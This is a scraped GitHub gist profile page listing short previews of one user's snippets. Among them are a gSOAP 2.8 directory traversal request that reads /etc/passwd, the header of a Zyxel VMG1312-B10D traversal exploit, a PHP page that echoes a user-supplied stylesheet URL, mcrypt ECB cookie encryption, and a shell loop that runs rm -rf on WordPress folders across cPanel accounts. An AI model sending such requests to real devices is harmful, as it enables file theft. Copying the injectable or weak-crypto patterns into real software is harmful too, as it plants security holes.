Skip to content

Instantly share code, notes, and snippets.

Numan Türle numanturle

  • Diyarbakır
Block or report user

Report or block numanturle

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View MCRYPT_RIJNDAEL_256
function encryptCookie($value){
if(!$value){return false;}
$key = APP_KEY;
$text = $value;
$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
$crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $text, MCRYPT_MODE_ECB, $iv);
return trim(base64_encode($crypttext)); //encode for cookie
}
View solve
import base64, json, os, random, re, subprocess, time, xml.sax
from io import StringIO
def setup(seed):
global state
state = 0
for i in range(16):
cur = seed & 3
seed >>= 2
state = (state << 4) | ((state & 3) ^ cur)
View gist:f83b4507cf419667f5ae690fe9921710
var yasakli = document.querySelectorAll('[aria-label="XXXXTopluluğu adlı kullanıcının yayınını beğenmekten vazgeç"]');
yasakli.forEach.call(yasakli, function(nesne){
nesne.click();
});
@numanturle
numanturle / code.php
Created Jan 27, 2020
css html via content svg url
View code.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Title of the document</title>
<link href="<?php echo (isset($_GET['css'])?htmlspecialchars($_GET['css']):null); ?>" rel="stylesheet">
</head>
<body>
Content of the document......
</body>
View wp update
for i in $(ls /var/cpanel/users); do if [ -f /home/$i/public_html/wp-load.php ]; then ; cd /home/$i/public_html/;rm -rf wp-admin;rm -rf wp-includes; cp /tmp/a.zip a.zip;unzip -o a.zip;rm -rf a.zip;chown -R $i:$i *;fi; done
View gSOAP 2.8 Directory Traversal
Request
############################
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.200.106.101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
View gist:d7a89f13c70d0ffa9e9b30bb90ccc85f
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf8
import urllib.request
import urllib.error
import time
from multiprocessing import Pool
start = time.time()
@numanturle
numanturle / functions.php
Created Aug 30, 2019
wordpress thumbnail
View functions.php
<?php
add_action('add_attachment', 'rename_attachment');
function rename_attachment($post_ID){
$file = get_attached_file($post_ID);
$get_file_title = get_post($post_ID);
if($get_file_title->post_parent){
$post_santize_title = sanitize_title(get_the_title($get_file_title->post_parent));
$path = pathinfo($file);
$newfilename = $post_santize_title."-".$post_ID;
@numanturle
numanturle / Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
Last active Nov 17, 2018
Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access - Details
View Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0
@modem_gateway = "192.168.1.1" // default address
You can’t perform that action at this time.